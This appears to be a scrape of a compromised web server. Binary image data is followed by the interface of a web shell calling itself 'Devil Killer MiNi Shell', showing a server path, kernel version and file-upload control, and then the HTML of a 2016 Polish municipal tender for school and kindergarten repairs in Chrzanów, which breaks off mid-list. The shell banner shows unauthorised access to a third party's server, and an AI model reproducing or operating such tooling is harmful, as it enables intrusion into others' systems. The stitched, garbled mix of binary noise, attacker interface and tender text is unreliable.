JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160408/36627-N-2016.html

<p class="kh_header"><b>Chrzanów: Wykonanie robót remontowych w placówkach oświatowych na terenie gminy Chrzanów w podziale na zadania.</b><br>
<b>Numer ogłoszenia: 36627 - 2016; data zamieszczenia: 08.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Ekonomiczno-Administracyjny Szkół i Przedszkoli w Chrzanowie , Aleja Henryka 20, 32-500 Chrzanów, woj. małopolskie, tel. 32 7538874, faks 32 7538882.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.malopolska.pl/zeasipwchrzanowie</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót remontowych w placówkach oświatowych na terenie gminy Chrzanów w podziale na zadania..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót remontowych w placówkach oświatowych na terenie gminy Chrzanów w podziale na zadania.

Zadanie I: Remont zaplecza kuchennego w Przedszkolu Samorządowym nr 11 w Chrzanowie, ul. Fabryczna 25.

Remont pomieszczeń zaplecza kuchennego w tym magazyn jarzyn i owoców, węzeł sanitarno-higieniczny, ciąg komunikacyjny oraz częściowo kuchnia, obieralnia, zmywalnia.
 
Zakres robót obejmuje: wymianę 2 szt. drzwi, rozebranie pieca kuchennego, uzupełnienie posadzki w miejscu rozebranego pieca, uzupełnieniu płytek na ścianie w kuchni, wykonanie posadzki z płytek ceramicznych w magazynie jarzyn, malowanie w/w pomieszczeń oraz ciągu komunikacyjnego.
Szczegółowy opis przedmiotu zamówienia dla zadania nr 1 precyzuje: przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót budowlanych -  załącznik nr 1A do SIWZ.  
	
Zadanie 2: Remont sanitariatów w Przedszkolu Samorządowym nr 10 z Oddziałami Integracyjnymi w Chrzanowie, ul. Władysława Sikorskiego 6.

Zakres robót obejmuje:                       
remont łazienki dla maluchów polegający na demontażu umywalek, misek ustępowych, baterii, zerwanie starych płytek ściennych, demontażu drzwi, wykonaniu nowych podejść, ułożeniu fliz na ścianach oraz ułożeniu płytek podłogowych, zamontowaniu kabin systemowych, zamontowaniu misek ustępowych dla maluchów w tym jednej dla niepełnosprawnych, zamontowaniu umywalek  
w tym jednej dla niepełnosprawnych, zamontowaniu brodzika, zamontowaniu uchwytów dla niepełnosprawnych, zamontowaniu nowych drzwi do sanitariatu, wymianie lamp, wymianie grzejników, pomalowaniu ścian i sufitu.

Szczegółowy opis przedmiotu zamówienia dla zadania nr 2 precyzuje: przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót budowlanych -  załącznik nr 2A do SIWZ.  
	
Zadanie 3: Remont sanitariatu gr IV w Przedszkolu Samorządowym nr 9 w Chrzanowie, ul. Brzezina 14.
 
Zakres robót obejmuje:
remont łazienki dla maluchów polegający na demontażu umywalek, misek ustępowych, brodzika, oraz baterii do w/w osprzętów, zerwaniu starych płytek ściennych, zamontowaniu systemowych kabin wraz ze ściankami i drzwiami, zamontowaniu misek ustępowych dla maluchów oraz umywalek dla maluchów wraz z wykonaniem nowych podejść, zamontowaniu baterii, zamontowaniu brodzika do mycia dzieci, ułożeniu fliz na ścianach łazienki, wykonaniu posadzki z płytek ceramicznych, wymianie lamp, pomalowaniu ścian i sufitu farbami zmywalnymi.

Szczegółowy opis przedmiotu zamówienia dla zadania nr 3 precyzuje: przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót budowlanych -  załącznik nr 3A do SIWZ.  

Zadanie 4: Remont parkietu i malowanie sali w Przedszkolu Samorządowym nr 10 
z Oddziałami Integracyjnymi w Chrzanowie, ul. Władysława Sikorskiego 6.
 
Zakres robót obejmuje:
rozebranie podłogi z klepki drewnianej, posegregowanie i wyczyszczenie klepek z rozbiórki,  wyczyszczenie  posadzki z resztek subitu, przeszlifowanie, wykonanie warstwy samopoziomującej, ułożenie podłogi z klepki drewnianej z rozbiórki, wycyklinowanie i pomalowanie podłogi przy użyciu lakierów przeznaczonych do pomieszczeń użyteczności publicznej, antypoślizgowych.
Malowanie farbami sufitu i ścian sali dla dzieci wraz z przygotowaniem powierzchni pod malowanie (do wysokości 2,0m należy wykonać powierzchnie zmywalne).
We wskazanych częściach ścian wykonać malowanie dekoracyjne dla potrzeb dzieci.

Szczegółowy opis przedmiotu zamówienia dla zadania nr 4 precyzuje: przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót budowlanych -  załącznik nr 4A do SIWZ.	

Zadanie 5: Remont parkietu i malowanie sali gr IV w Przedszkolu Samorządowym 
nr 9 w Chrzanowie, ul. Brzezina 14.
 
Zakres robót obejmuje:
cyklinowanie i malowanie parkietu w sali przedszkolnej przy użyciu farb przeznaczonych do malowania obiektów użyteczności publicznej, antypoślizgowych oraz malowanie sufitu  i ścian sali  dla dzieci wraz z przygotowaniem powierzchni pod malowanie (do wysokości 2,0m należy wykonać powierzchnie zmywalne).
We wskazanych częściach ścian wykonać malowanie dekoracyjne dla potrzeb dzieci.

Szczegółowy opis przedmiotu zamówienia dla zadania nr 5 precyzuje: przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót budowlanych -  załącznik nr 5A do SIWZ.	

Zadanie 6: Remont parkietu w salach lekcyjnych w Szkole Podstawowej nr 1 
w Chrzanowie, ul. Borelowskiego 1.

Zakres robót obejmuje: 
cyklinowanie i malowanie parkietu w  salach lekcyjnych przy użyciu farb przeznaczonych do malowania obiektów użyteczności publicznej.

Szczegółowy opis przedmiotu zamówienia dla zadania nr 6 precyzuje: przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót budowlanych -  załącznik nr 6A do SIWZ.	

Zadanie 7: Remont jadalni w Przedszkolu Samorządowym nr 8 w Chrzanowie, 
ul. Kościuszki 10.

Zakres robót obejmuje: 
wymianę drzwi do jadalni, zerwanie posadzki z płytek pcv i wykonanie nowej posadzki ze zgrzewanego pcv, zamontowanie sufitu podwieszonego, malowanie sufitu i ścian wraz z przygotowaniem  powierzchni pod  malowanie (do wysokości 2,0m należy wykonać powierzchnie zmywalne).

Szczegółowy opis przedmiotu zamówienia dla zadania nr 7 precyzuje: przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót budowlanych -  załącznik nr 7A do SIWZ.	

Zadanie 8: Remont szatni w Przedszkolu Samorządowym nr 1 w Chrzanowie, 
ul. Śląska 74b.

Zakres robót obejmuje: remont szatni polegający na montażu drzwi aluminiowych z szybą bezpieczną pomiędzy szatnią a jadalnią, oraz remont toalety przy szatni polegający na zamontowaniu brodzika,  wymianie armatury sanitarnej, uzupełnieniu wykładziny podłogowej i ściennej. 

Szczegółowy opis przedmiotu zamówienia dla zadania nr 8 precyzuje: dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót budowlanych -  załącznik nr 8A do SIWZ.	

Uwaga: Ewentualne nazwy materiałów użyte w przedmiarach robót i STWiORB należy traktować jako wzorcowe. Wykonawca ma prawo do zaproponowania materiałów lub urządzeń równoważnych. 

2. Oznaczenie przedmiotu zamówienia wg CPV: 
45400000-1 Roboty wykończeniowe w zakresie obiektów budowlanych
45310000-3 Roboty instalacyjne elektryczne
45330000-9 Roboty instalacyjne wodno-kanalizacyjne i sanitarne
45432111-5 Kładzenie wykładzin elastycznych
45432113-9 Kładzenie parkietu
45442100-8 Roboty malarskie..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.31.00.00-3, 45.33.00.00-9, 45.43.21.11-5, 45.43.21.13-9, 45.44.21.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełnienia tego warunku. Zamawiający uzna warunek za spełniony na podstawie stosownego oświadczenia złożonego zgodnie ze wzorem określonym  w załączniku nr 1 do formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że w okresie ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) przed upływem terminu składania ofert, wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył: 
a)  co najmniej dwie roboty polegające na malowaniu wnętrza budynku lub jego części o pow. min. 100m2 każda - warunek a dotyczy zadania nr 1;

b) co najmniej dwie roboty polegające na  wymianie płytek ceramicznych o pow. min 50m2 każda wraz z białym montażem - warunek b dotyczy zadania nr 2; 

c) co najmniej dwie roboty polegające na  wymianie płytek ceramicznych o pow. min 50m2 każda wraz z białym montażem - warunek c dotyczy zadania nr 3; 

d)  co najmniej dwie roboty polegające na malowaniu wnętrza budynku lub jego części o pow. min. 100m2 każda  oraz co najmniej jedną robotę obejmującą swym zakresem układanie parkietów lub innych posadzek drewnianych o powierzchni minimum 50m2 - warunek d dotyczy zadania nr 4;

e)  co najmniej dwie roboty polegające na malowaniu wnętrza budynku lub jego części o pow. min. 100m2 każda  oraz co najmniej jedną robotę obejmującą swym zakresem układanie parkietów lub innych posadzek drewnianych o powierzchni minimum 50m2 - warunek e dotyczy zadania nr 5;

f) co najmniej dwie roboty polegające na cyklinowaniu i malowaniu parkietów lub innych posadzek drewnianych o powierzchni minimum 50m2 każda - warunek f dotyczy zadania nr 6;

g) co najmniej dwie roboty polegające na malowaniu wnętrza budynku lub jego części o pow. min. 100m2 każda oraz co najmniej jedną robotę obejmującą swym zakresem układanie podłóg ze zgrzewanego pcv o powierzchni minimum 30m2 - warunek g dotyczy zadania nr 7;

h) co najmniej dwie roboty polegające na wymianie płytek ceramicznych o pow. min 10m2 każda wraz z białym montażem - warunek h dotyczy zadania nr 8.

Uwaga: Zamawiający uzna powyższy warunek za spełniony także wówczas jeżeli prace obejmujące wymagane zakresy robót wykonane zostały w tym samym obiekcie, czy też w ramach tych samych zadań. Wykonawca przy wykazaniu spełnienia przedmiotowego warunku dla poszczególnych zadań może posłużyć się tymi samymi robotami.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełnienia tego warunku. Zamawiający uzna warunek za spełniony na podstawie stosownego oświadczenia złożonego zgodnie ze wzorem określonym w załączniku nr 1 do formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wskaże do uczestnictwa w wykonaniu niniejszego zamówienia co najmniej jedną osobę posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej - dot. zadania 2 i 3.

Uwaga: Warunek zostanie spełniony, jeżeli wykonawca przedstawi co najmniej jedną osobę posiadającą uprawnienia. 

Zamawiający nie dokonuje opisu sposobu oceny spełnienia tego warunku dla zadania 1,4,5,6,7,8. Zamawiający uzna warunek za spełniony na podstawie stosownego oświadczenia złożonego zgodnie ze wzorem określonym w załączniku nr 1 do formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełnienia tego warunku. Zamawiający uzna warunek za spełniony na podstawie stosownego oświadczenia złożonego zgodnie ze wzorem określonym  w załączniku nr 1 do formularza ofertowego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy (w formie oryginału) - wzór zawiera zał. nr 3 do SIWZ . 
2. Pełnomocnictwo do reprezentowania wykonawcy o ile ofertę podpisuje pełnomocnik, a stosowne upoważnienie nie wynika z przepisów prawa lub innych dokumentów załączonych do oferty. Pełnomocnictwo wymagane jest również w przypadku, gdy ofertę składa kilka podmiotów występujących wspólnie. 
3. Podpisany przez osoby uprawnione projekt umowy - fakultatywnie - wzór zawiera zał. nr 2 do SIWZ.
4. Pisemne zobowiązanie podmiotu trzeciego do udostępnienia wiedzy i doświadczenia lub osób zdolnych do wykonania zamówienia wyłącznie w sytuacji gdy Wykonawca będzie polegał na zasobach innych podmiotów przy wykonaniu zamówienia zgodnie z art. 26 ust. 2b ustawy PZP - wzór zobowiązania zawiera  zał. nr 7 do formularza ofertowego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji (odrębnie dla każdego z zadań) - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w kwestii:
a) zmiany terminu wykonania zamówienia (skrócenia lub wydłużenia): 
na skutek zadziałania siły wyższej w rozumieniu przepisów Kodeksu cywilnego; 
w przypadku wcześniejszego zakończenia realizacji zamówienia; 
wskutek konieczności wykonania zamówień dodatkowych; 
wskutek wystąpienia innych okoliczności nie powstałych z winy Wykonawcy.   
zmiany kierownika budowy/robót po stronie Wykonawcy, wówczas gdy zaszły okoliczności, których Wykonawca nie mógł przewidzieć na etapie przygotowania oferty np. rozwiązanie stosunku pracy z osobą wyznaczoną do pełnienia określonej funkcji, rozwiązanie umowy cywilno-prawnej z pracownikiem, utrata uprawnień zawodowych;
c) zmiany podwykonawcy w skutek utraty zdolności podwykonawcy do uczestnictwa w realizacji zamówienia, zmiany zakresu robót podwykonawcy wskazanego w ofercie; zgłoszenia udziału podwykonawcy w wyniku wystąpienia okoliczności, których wykonawca nie mógł przewidzieć na etapie przygotowania oferty;
d) zmiany zastosowanych materiałów i urządzeń, wskutek zaistnienia możliwości zastosowania lepszych materiałów, technologii lub urządzeń o parametrach nie gorszych niż ujęte w dokumentacji projektowej oraz w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych, za cenę nie wyższą od ceny wynikającej z oferty wykonawcy;   
e) zmiany sposobu realizacji zadania, z powodu wystąpienia uzasadnionych zmian w zakresie wykonania przedmiotu zamówienia, jeżeli zmiany te są korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.malopolska.pl/zeasipwchrzanowie<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://bip.malopolska.pl/zeasipwchrzanowie, zakładka: zamówienia publiczne, zakładka ogłoszenia lub można odebrać osobiście w siedzibie Zamawiającego, II p., pok. 77.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2016 godzina 15:00, miejsce: Oferty należy składać w siedzibie Zamawiającego, Aleja Henryka 20, 32-500 Chrzanów, sekretariat II p.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I: Remont zaplecza kuchennego w Przedszkolu Samorządowym nr 11 w Chrzanowie, ul. Fabryczna 25..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont pomieszczeń zaplecza kuchennego w tym magazyn jarzyn i owoców, węzeł sanitarno-higieniczny, ciąg komunikacyjny oraz częściowo kuchnia, obieralnia, zmywalnia.
 
Zakres robót obejmuje: wymianę 2 szt. drzwi, rozebranie pieca kuchennego, uzupełnienie posadzki w miejscu rozebranego pieca, uzupełnieniu płytek na ścianie w kuchni, wykonanie posadzki z płytek ceramicznych w magazynie jarzyn, malowanie w/w pomieszczeń oraz ciągu komunikacyjnego.
Szczegółowy opis przedmiotu zamówienia dla zadania nr 1 precyzuje: przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót budowlanych -  załącznik nr 1A do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.07.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
